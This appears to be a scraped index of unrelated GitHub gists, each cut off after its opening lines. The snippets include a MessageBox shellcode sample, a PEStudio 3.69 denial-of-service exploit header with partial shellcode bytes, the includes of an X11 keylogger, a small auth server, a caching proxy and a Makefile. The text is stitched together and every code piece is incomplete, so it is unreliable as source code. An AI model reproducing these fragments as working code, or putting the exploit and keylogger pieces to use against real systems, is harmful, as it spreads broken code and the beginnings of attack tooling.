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; Sample shellcode that will pop a MessageBox
; with custom title and text
; Written by Peter Van Eeckhoutte
[Section .text]
[BITS 32]
global _start
# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( )
# Blog :
# Software Homepage:
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.
from pefile import PE
from struct import pack
# windows/messagebox - 265 bytes
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false,
# TEXT=Debasish Was Here!
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
# coding=UTF-8
from __future__ import division
import re
# This is a naive text summarization algorithm
# Created by Shlomi Babluki
# April, 2013
class SummaryTool(object):
fxsjy /
Created April 26, 2013 06:23
SimpleAuthServer: A SimpleHTTPServer with authentication
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import sys
import base64
key = ""
class AuthHandler(SimpleHTTPRequestHandler):
''' Main class to present webpages and authentication. '''
def do_HEAD(self):
bxt /
Last active August 30, 2020 15:57
A very basic caching python HTTP proxy server.
# Originally from
# Usage:
# A call to http://localhost:80000/ will cache the file
# at on disc and not redownload it again.
# To clear the cache simply do a `rm *.cached`. To stop the server simply
# send SIGINT (Ctrl-C). It does not handle any headers or post data.
import BaseHTTPServer
import hashlib
robertklep / gist:5124355
Created March 9, 2013 14:41
X11 keylogger
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
hanshoglund / memdump.c
Created January 15, 2013 20:32
C memdump
void memdump(void* s, size_t n)
for (size_t i = 0; i < n; ++i)
printf("%x ", *((unsigned char*) (s + i)) );
naholyr /
Created December 13, 2012 09:39
Sample /etc/init.d script

Sample service script for debianoids

Look at LSB init scripts for more information.


Copy to /etc/init.d:

# replace "$YOUR_SERVICE_NAME" with your service's name (whenever it's not enough obvious)
mattmccray / Makefile
Created October 19, 2012 04:15
Simple comparison of several compile-to-javascript languages, including: CoffeeScript, Dart, Haxe, and TypeScript.
.PHONY: compile
compile: dart typescript coffeescript haxe jsx
$(time) dart2js -ooutput/dart.js source/simple.dart